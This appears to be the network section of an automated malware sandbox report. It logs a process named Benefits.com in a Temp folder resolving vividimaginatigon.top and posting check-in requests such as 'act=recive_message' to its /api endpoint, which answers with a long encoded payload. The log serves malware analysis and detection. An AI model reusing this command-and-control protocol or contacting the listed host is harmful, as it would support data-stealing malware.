                                      Jan 31, 2025 19:49:45.572168112 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.572176933 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.572379112 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:45.573662043 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.573695898 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:45.573724031 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.413428068 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.413484097 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.413511992 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.413541079 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.413580894 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.413626909 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.413641930 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.413641930 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.413666964 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.413686037 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.414015055 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.414058924 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.414067030 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.419945002 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.419996977 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.420001984 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.420011997 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.420056105 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.500062943 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.500116110 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.500138998 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.500200033 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.500266075 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.500266075 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.500557899 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.500574112 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.500583887 CET49740443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.500587940 CET44349740172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.558408022 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.558499098 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:46.558613062 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.558922052 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:46.558959007 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:47.037108898 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:47.037204027 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:47.038588047 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:47.038608074 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:47.038817883 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:47.040018082 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:47.040198088 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:47.040262938 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:47.040365934 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:47.040379047 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.037642002 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.037727118 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.037822008 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.038012981 CET49741443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.038064957 CET44349741172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.055617094 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.055658102 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.055741072 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.056034088 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.056046009 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.512777090 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.512917042 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.514430046 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.514437914 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.514638901 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:57.515765905 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.516010046 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:57.516036987 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:58.133527040 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:58.133610010 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:58.133670092 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:58.320446968 CET49742443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:58.320472956 CET44349742172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:58.574517965 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:58.574603081 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:58.574697971 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:58.575527906 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:58.575578928 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.036375046 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.036454916 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.039438009 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.039457083 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.039865971 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.041868925 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.042187929 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.042227030 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.042324066 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.042340040 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.747894049 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.748027086 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.748095036 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.748286963 CET49743443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.748328924 CET44349743172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.832238913 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.832278967 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:49:59.832356930 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.832638979 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:49:59.832657099 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:00.310013056 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:00.310097933 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:00.311819077 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:00.311832905 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:00.312156916 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:00.313409090 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:00.313524008 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:00.313549995 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:00.839689970 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:00.843673944 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:00.843756914 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:00.843871117 CET49744443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:00.843893051 CET44349744172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.125087976 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.125175953 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.125260115 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.125607967 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.125642061 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.666305065 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.666407108 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.667741060 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.667762995 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.668093920 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.671374083 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.672122002 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.672167063 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.672302961 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.672348022 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.672492027 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.672542095 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.672694921 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.672751904 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.672952890 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.672996044 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.673207998 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.673243046 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.673263073 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.673284054 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.673461914 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.673502922 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.673546076 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.673645020 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.673716068 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.682351112 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.682584047 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.682621956 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.682692051 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.682729959 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:01.682837963 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:01.687140942 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.271733999 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.271845102 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.271934986 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.372881889 CET49745443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.372924089 CET44349745172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.376380920 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.376427889 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.376512051 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.377377033 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.377408028 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.869651079 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.869733095 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.871135950 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.871159077 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.871505022 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:03.872668982 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.872705936 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:03.872761965 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:04.369810104 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:04.369916916 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:04.370013952 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:04.370263100 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:04.370299101 CET44349747172.67.158.151192.168.2.4
                                      Jan 31, 2025 19:50:04.370325089 CET49747443192.168.2.4172.67.158.151
                                      Jan 31, 2025 19:50:04.370341063 CET44349747172.67.158.151192.168.2.4
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 31, 2025 19:49:12.845161915 CET5120753192.168.2.41.1.1.1
                                      Jan 31, 2025 19:49:12.853854895 CET53512071.1.1.1192.168.2.4
                                      Jan 31, 2025 19:49:43.293083906 CET5462353192.168.2.41.1.1.1
                                      Jan 31, 2025 19:49:43.504250050 CET53546231.1.1.1192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 31, 2025 19:49:12.845161915 CET192.168.2.41.1.1.10x1223Standard query (0)aWntkHZhzENhUIyZkjTD.aWntkHZhzENhUIyZkjTDA (IP address)IN (0x0001)false
                                      Jan 31, 2025 19:49:43.293083906 CET192.168.2.41.1.1.10xc1a0Standard query (0)vividimaginatigon.topA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 31, 2025 19:49:12.853854895 CET1.1.1.1192.168.2.40x1223Name error (3)aWntkHZhzENhUIyZkjTD.aWntkHZhzENhUIyZkjTDnonenoneA (IP address)IN (0x0001)false
                                      Jan 31, 2025 19:49:43.504250050 CET1.1.1.1192.168.2.40xc1a0No error (0)vividimaginatigon.top172.67.158.151A (IP address)IN (0x0001)false
                                      Jan 31, 2025 19:49:43.504250050 CET1.1.1.1192.168.2.40xc1a0No error (0)vividimaginatigon.top104.21.33.42A (IP address)IN (0x0001)false
                                      • vividimaginatigon.top
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449739172.67.158.1514437748C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      TimestampBytes transferredDirectionData
                                      2025-01-31 18:49:44 UTC268OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 8
                                      Host: vividimaginatigon.top
                                      2025-01-31 18:49:44 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                      Data Ascii: act=life
                                      2025-01-31 18:49:45 UTC1133INHTTP/1.1 200 OK
                                      Date: Fri, 31 Jan 2025 18:49:44 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=no019nq60f7lmg79p2op1nearc; expires=Sat, 01 Feb 2025 18:49:44 GMT; Max-Age=86400; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uSQStyPi1fQqO4%2Fp9qEKT%2FAWLzkAVpNP5Md80qOyLGAAZr8yIG0O8g7gGv8UhNnPvhBsCQBENyZ7s3fSu3U2zqKgpC1ecythKte7UOl30zK7SWEnUsB9%2BDseoZWoo%2FKA%2FYMcUjrRFqo%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 90abe222eb09de93-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1699&rtt_var=657&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=912&delivery_rate=1640449&cwnd=249&unsent_bytes=0&cid=11e2f029b170755b&ts=862&x=0"
                                      2025-01-31 18:49:45 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                      Data Ascii: 2ok
                                      2025-01-31 18:49:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449740172.67.158.1514437748C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                      TimestampBytes transferredDirectionData
                                      2025-01-31 18:49:45 UTC269OUTPOST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 48
                                      Host: vividimaginatigon.top
                                      2025-01-31 18:49:45 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 26 6a 3d
                                      Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--cheksa&j=
                                      2025-01-31 18:49:46 UTC1131INHTTP/1.1 200 OK
                                      Date: Fri, 31 Jan 2025 18:49:46 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=kcfnqroacn8qh2vlov8g572p6e; expires=Sat, 01 Feb 2025 18:49:46 GMT; Max-Age=86400; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tXy6OChdWy0LLoDG9eRnVTH4dwOobxsPw%2FkZsp9ft4et173IRHW0zKsRm%2Furs%2FzHQevJ9MRI%2FcDKnkk2GQQeseujosdYDUZmpcy2fXWxmuuh2uJY5odtC0tGifDNwDB7uUBVTxJr2rE%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 90abe22c6e3a4331-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1629&rtt_var=612&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=953&delivery_rate=1792510&cwnd=238&unsent_bytes=0&cid=b7b2c7482b2f1d58&ts=849&x=0"
                                      2025-01-31 18:49:46 UTC238INData Raw: 34 39 39 34 0d 0a 50 6e 6f 46 30 4f 67 37 72 31 4b 4c 71 77 54 46 37 7a 52 4f 73 68 34 77 42 43 76 33 64 51 72 55 38 31 31 69 46 78 45 53 4d 62 39 46 57 48 50 79 30 67 2b 44 63 50 6a 4f 4a 76 2b 62 52 6a 76 58 4d 68 4a 6c 54 39 56 50 62 4c 57 66 4c 67 63 37 4d 32 52 63 6e 51 51 63 5a 4c 79 62 58 6f 4e 77 37 74 4d 6d 2f 37 52 50 62 4e 64 77 45 6a 34 4a 6b 68 39 6f 74 5a 38 2f 41 33 78 2b 59 6c 33 63 56 68 5a 69 75 49 31 59 79 7a 50 6e 78 6d 47 67 69 6c 55 6b 33 48 64 64 62 45 62 56 57 53 69 78 69 58 39 59 4e 56 78 33 52 64 35 7a 47 33 61 37 79 6b 61 44 4b 61 6e 4f 61 75 66 56 46 69 2f 58 66 46 78 69 54 35 77 64 59 72 79 58 50 67 5a 39 59 58 74 58 31 31 59 59 59 62 6d 48 55 64 38 2b 37 63 46 71 70 6f 42 56
                                      Data Ascii: 4994PnoF0Og7r1KLqwTF7zROsh4wBCv3dQrU811iFxESMb9FWHPy0g+DcPjOJv+bRjvXMhJlT9VPbLWfLgc7M2RcnQQcZLybXoNw7tMm/7RPbNdwEj4Jkh9otZ8/A3x+Yl3cVhZiuI1YyzPnxmGgilUk3HddbEbVWSixiX9YNVx3Rd5zG3a7ykaDKanOaufVFi/XfFxiT5wdYryXPgZ9YXtX11YYYbmHUd8+7cFqpoBV
                                      2025-01-31 18:49:46 UTC1369INData Raw: 62 4a 34 38 56 58 34 4a 7a 56 63 37 68 4a 49 75 45 57 42 2b 59 46 57 64 51 31 5a 2b 38 6f 31 56 6a 57 69 70 77 57 71 70 69 46 55 6a 31 33 31 53 64 45 61 56 46 47 43 2b 6c 54 55 50 65 6e 78 2b 57 64 70 55 45 57 43 39 6a 56 48 4c 50 2b 71 4a 4b 4f 65 4b 54 6d 79 49 50 48 4a 32 53 70 59 44 5a 61 66 52 49 45 35 73 4d 33 64 66 6e 51 52 59 59 62 79 4c 56 4d 30 69 34 63 4a 74 6f 70 39 64 4a 64 31 78 55 6d 74 44 6d 68 52 6f 73 5a 73 31 44 33 39 33 66 56 37 62 58 42 67 6e 2f 4d 70 65 31 58 43 78 69 55 57 69 6e 56 45 67 78 6a 35 6f 4a 6c 62 62 44 69 69 78 6e 58 39 59 4e 58 74 31 55 4e 35 58 46 32 53 36 67 55 76 4e 49 75 2f 45 59 37 57 4c 55 79 4c 61 66 30 42 73 52 35 4d 55 59 62 32 59 4f 67 64 78 4d 7a 34 54 32 6b 52 59 50 2f 4b 72 56 4d 59 38 34 39 35 6d 35 35 49
                                      Data Ascii: bJ48VX4JzVc7hJIuEWB+YFWdQ1Z+8o1VjWipwWqpiFUj131SdEaVFGC+lTUPenx+WdpUEWC9jVHLP+qJKOeKTmyIPHJ2SpYDZafRIE5sM3dfnQRYYbyLVM0i4cJtop9dJd1xUmtDmhRosZs1D393fV7bXBgn/Mpe1XCxiUWinVEgxj5oJlbbDiixnX9YNXt1UN5XF2S6gUvNIu/EY7WLUyLaf0BsR5MUYb2YOgdxMz4T2kRYP/KrVMY8495m55I
                                      2025-01-31 18:49:46 UTC1369INData Raw: 45 42 71 51 35 4d 59 5a 62 72 52 63 55 42 79 61 7a 41 4c 6e 58 59 62 63 37 47 41 47 2f 67 7a 35 38 64 68 73 63 31 4a 59 73 6b 38 56 57 6f 4a 7a 56 64 6c 74 35 6b 35 45 6e 70 2b 63 31 33 54 55 78 31 6f 75 6f 70 5a 77 44 58 74 77 6d 32 6b 67 46 49 2b 32 6e 78 61 59 30 69 66 48 53 6a 34 30 54 67 59 4e 53 73 77 59 73 70 58 57 6c 4b 78 68 46 66 4b 4a 71 6e 57 4b 4c 37 4e 55 53 43 51 4a 42 4a 72 51 5a 41 53 5a 37 65 62 4d 51 56 2f 66 33 68 64 33 6b 34 58 59 37 4b 47 55 63 63 39 35 38 31 75 72 6f 5a 64 4b 74 42 39 57 43 59 48 31 52 42 77 39 73 6c 2f 4e 48 4a 2f 66 56 79 66 61 52 74 70 76 49 31 50 6a 53 2b 6e 30 43 61 67 67 52 5a 30 6b 48 42 62 5a 6b 4b 66 45 32 69 78 6e 44 6f 44 63 6e 42 39 56 4e 64 53 48 32 4f 2b 67 31 54 4c 4d 4f 37 4e 59 37 57 49 58 79 44 63
                                      Data Ascii: EBqQ5MYZbrRcUByazALnXYbc7GAG/gz58dhsc1JYsk8VWoJzVdlt5k5Enp+c13TUx1ouopZwDXtwm2kgFI+2nxaY0ifHSj40TgYNSswYspXWlKxhFfKJqnWKL7NUSCQJBJrQZASZ7ebMQV/f3hd3k4XY7KGUcc9581uroZdKtB9WCYH1RBw9sl/NHJ/fVyfaRtpvI1PjS+n0CaggRZ0kHBbZkKfE2ixnDoDcnB9VNdSH2O+g1TLMO7NY7WIXyDc
                                      2025-01-31 18:49:46 UTC1369INData Raw: 2f 56 43 43 61 76 30 54 67 4d 4e 53 73 77 57 74 52 4f 46 6d 6d 37 68 31 2f 46 4e 2b 66 45 62 61 47 47 55 53 76 57 63 56 70 72 54 4a 59 57 62 4c 79 44 50 41 74 2f 66 6e 6f 54 6b 78 77 66 66 2f 4c 53 47 65 6f 38 77 4e 6c 39 74 5a 73 57 4d 35 35 6c 45 6d 46 46 31 55 38 6f 74 5a 34 32 44 33 31 37 66 31 7a 5a 55 68 35 68 76 34 39 57 78 79 4c 68 78 32 75 73 67 6c 30 2b 30 48 46 57 61 6b 32 64 48 47 4c 32 33 33 38 48 62 54 4d 6f 45 2b 68 52 46 32 65 78 6e 42 6e 53 66 76 43 4a 59 61 76 4e 44 6d 7a 63 63 6c 4a 70 52 5a 6b 63 59 4c 65 64 4d 51 64 77 65 6e 68 62 7a 31 30 63 62 37 4f 45 56 73 77 30 37 4d 78 69 6f 49 6c 51 49 35 41 79 45 6d 46 52 31 55 38 6f 6d 62 59 4b 51 6c 52 4a 4d 45 79 54 52 56 68 67 76 73 6f 42 6a 54 7a 71 78 57 36 6f 69 31 38 67 32 6e 56 5a 61
                                      Data Ascii: /VCCav0TgMNSswWtROFmm7h1/FN+fEbaGGUSvWcVprTJYWbLyDPAt/fnoTkxwff/LSGeo8wNl9tZsWM55lEmFF1U8otZ42D317f1zZUh5hv49WxyLhx2usgl0+0HFWak2dHGL2338HbTMoE+hRF2exnBnSfvCJYavNDmzcclJpRZkcYLedMQdwenhbz10cb7OEVsw07MxioIlQI5AyEmFR1U8ombYKQlRJMEyTRVhgvsoBjTzqxW6oi18g2nVZa
                                      2025-01-31 18:49:46 UTC1369INData Raw: 72 73 70 51 77 41 58 52 31 59 6c 54 55 54 68 5a 71 76 59 4a 52 78 44 48 74 7a 47 75 68 67 56 77 74 31 33 4a 63 62 67 6e 62 56 32 2b 75 30 57 64 41 56 47 4e 72 51 63 74 52 4f 57 71 39 79 6b 61 44 4b 61 6e 4f 61 75 66 56 46 69 58 43 65 46 39 30 51 4a 49 5a 5a 37 57 44 50 67 31 2b 59 58 64 63 32 56 73 55 59 62 32 4d 57 4d 67 36 35 63 35 6a 72 49 4a 61 62 4a 34 38 56 58 34 4a 7a 56 64 47 76 59 49 6f 41 33 74 34 5a 6b 69 64 51 31 5a 2b 38 6f 31 56 6a 57 69 70 79 6d 32 73 69 56 59 67 30 48 68 66 5a 6c 75 61 45 47 2b 2f 6d 69 30 4b 63 6e 52 37 57 39 5a 54 48 6e 57 2b 68 45 76 49 49 76 75 4a 4b 4f 65 4b 54 6d 79 49 50 47 52 68 57 59 55 55 4b 6f 65 48 50 42 5a 2b 66 6e 77 54 77 68 49 42 4a 37 57 47 47 5a 56 77 37 38 5a 76 70 49 4a 58 4a 64 78 78 56 32 39 4d 6c 42
                                      Data Ascii: rspQwAXR1YlTUThZqvYJRxDHtzGuhgVwt13JcbgnbV2+u0WdAVGNrQctROWq9ykaDKanOaufVFiXCeF90QJIZZ7WDPg1+YXdc2VsUYb2MWMg65c5jrIJabJ48VX4JzVdGvYIoA3t4ZkidQ1Z+8o1VjWipym2siVYg0HhfZluaEG+/mi0KcnR7W9ZTHnW+hEvIIvuJKOeKTmyIPGRhWYUUKoeHPBZ+fnwTwhIBJ7WGGZVw78ZvpIJXJdxxV29MlB
